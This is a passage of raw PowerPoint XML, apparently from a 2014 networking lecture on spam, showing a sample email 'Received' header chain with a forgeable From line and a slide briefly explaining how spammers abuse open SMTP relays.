                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ieee.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Received</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> from smtp6.sgsi.ucl.ac.be (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>smtp.sgsi.ucl.ac.be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>. [130.104.5.67])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mx.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> with ESMTP id fo15si7407415wic.42.2014.01.27.16.06.45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        for &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>m.canini.c@ieee.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        Mon, 27 Jan 2014 16:06:45 -0800 (PST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Received</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> from mmp-1-1.sipr-dc.ucl.ac.be (mmp-1-1.sipr-dc.ucl.ac.be [10.1.3.4])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	by smtp6.sgsi.ucl.ac.be (Postfix) with ESMTP id 455901C6ADF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	for &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>m.canini.c@ieee.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;; Tue, 28 Jan 2014 01:06:38 +0100 (CET)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Received</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> from smtp5.sgsi.ucl.ac.be (unknown [10.1.5.5])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mmp.sipr-dc.ucl.ac.be</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (Oracle Communications Messaging Exchange Server 7u4-19.01 64bit (built Sep  7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 2010)) with ESMTP id &lt;0N0300IT74B2I8A0@mmp.sipr-dc.ucl.ac.be&gt; for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>m.canini.c@ieee.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (ORCPT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>marco.canini@uclouvain.be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>); Tue,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 28 Jan 2014 01:06:38 +0100 (CET)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>From: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>this-can-be@anythi.ng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Received:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>smtp.sgsi.ucl.ac.be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (haproxy2.sipr.ucl.ac.be [130.104.5.120])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	by smtp5.sgsi.ucl.ac.be (Postfix) with SMTP id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1A000198046 for</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>marco.canini@uclouvain.be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;; Tue, 28 Jan 2014 01:06:31 +0100 (CET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Right Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1814468"/>
            <a:ext cx="695325" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="19050"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11" name="Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="2728868"/>
            <a:ext cx="695325" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="19050"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12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3567068"/>
            <a:ext cx="695325" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="19050"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13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="5334000"/>
            <a:ext cx="695325" cy="419100"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3096789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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spamming Techniques (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377859" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Method 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Abuse of open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>relays</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A single message is dropped into a few SMTP servers with thousands of destination addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>each</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The abused servers politely send out one copy of the message to each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>destination</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="4267200"/>
            <a:ext cx="3942522" cy="2667000"/>
            <a:chOff x="2256" y="1488"/>
            <a:chExt cx="3264" cy="2208"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4032" y="2208"/>
              <a:ext cx="1056" cy="38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r>
                <a:rPr lang="en-US" sz="1400"/>
                <a:t>SMTP Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 7"/>
            <p:cNvSpPr>
              <a:spLocks/>
